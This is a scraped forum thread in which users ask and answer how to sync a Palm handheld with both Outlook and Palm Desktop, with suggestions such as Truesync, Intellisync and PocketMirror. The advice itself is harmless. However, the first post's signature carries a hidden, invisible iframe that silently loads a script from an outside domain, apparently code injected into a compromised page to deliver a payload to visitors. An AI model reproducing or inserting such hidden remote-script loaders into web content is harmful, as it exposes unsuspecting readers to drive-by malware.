+ Reply to Thread

Sync with Outlook Calendar and Palm Desktop too

Hi All,

Anybody know of a solution where I can sync with Outook calendar and Palm Desktop too at the same time? Specifically, I prefer using palm desktop for everything (much more efficient) but here at work I get scheduled for meetings through Outlook. I know Desktop-To-Go can sync with Outlook Calendar and send a copy of everything to Palm Desktop Calendar as a backup. However, if you've entered anything new in the Palm Desktop calendar, it is wiped out and not synced.
    Why can't we all just get along?

Does anybody know of a program that can do this?
    Thanx
    -GadgetPro<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Not on the same PC as far as I know. If you synced with Palm Desktop at home and Outlook at work it would be fine, but the conduit can't do both.

I would never use Palm desktop again after using Outlook for so long.

I agree. Outlook is much better than Palm Desktop. I used to sync with Palm at home and Outlook at work, but now I've gone to Outlook at both.

Re: Sync with Outlook Calendar and Palm Desktop too

Originally posted by Gadgetpro
    Hi All,

Anybody know of a solution where I can sync with Outook calendar and Palm Desktop too at the same time? Specifically, I prefer using palm desktop for everything (much more efficient) but here at work I get scheduled for meetings through Outlook. I know Desktop-To-Go can sync with Outlook Calendar and send a copy of everything to Palm Desktop Calendar as a backup. However, if you've entered anything new in the Palm Desktop calendar, it is wiped out and not synced.
    Why can't we all just get along?

Does anybody know of a program that can do this?
    Thanx
    -GadgetPro
    If you can track down a copy of Truesync, it can do it. I got it with my Motorola StarTac. I didn't like how it sync's directly to the palm, but I use it to sync the desktop with Outlook, then do a seperate Hotsync to sync up the phone.

Alan

Multiple Sync

It sounds like you are using Palm Desktop at home and Outlook at work. If this is correct, there is no problem. Just run the installation CD at work and sync to Outlook. At home, use Palm Desktop. There will be no problems with this setup.

If on the other hand you want to use Palm Desktop at work as well, that is a can of worms I do not want to open. However this product may do what you want.

is it possible to sync. with outlook express?

Sync

I do not think the above software can use OE, but this does. Also, Intellisync will sync to OE.

The only issie with either of these two is they do not sync to both Outlook/OE and the Palm Desktop during one Sync.

Of course, you always have the option of going into the Chapura Settings, if PocketMirror is installed, and choosing one of the quick one time setup actions listed.

thanx asmoore!

I use intellisync to sync my outlook and palm. you must do each sepratly but this is fast due to the usb connection. I love the intellisync software it gives you alot of options. I got mine at compusa. good luck
    Thomas

6035 Kyocera Smartphone

7135 Kyocera Smartphone

The product asmoore pointed you too sounds like your solution.
    DoubleLook

Yet another headache.

Sync at Work.

I have Outlook at work. I would love to be able to sync HOWEVER we are running NT 4.0 service pack 4. Palm desktop will not load, nor will PocketMirror (name?) as it says it needs Palm desktop to be loaded 1st.

I do happen to have Truesync installed, as I used this program with my Startac. But how do I sync it with the 7135? When I start it, it is looking for the Motorola Clip on organizer.

Any help greatly appreciated!!!!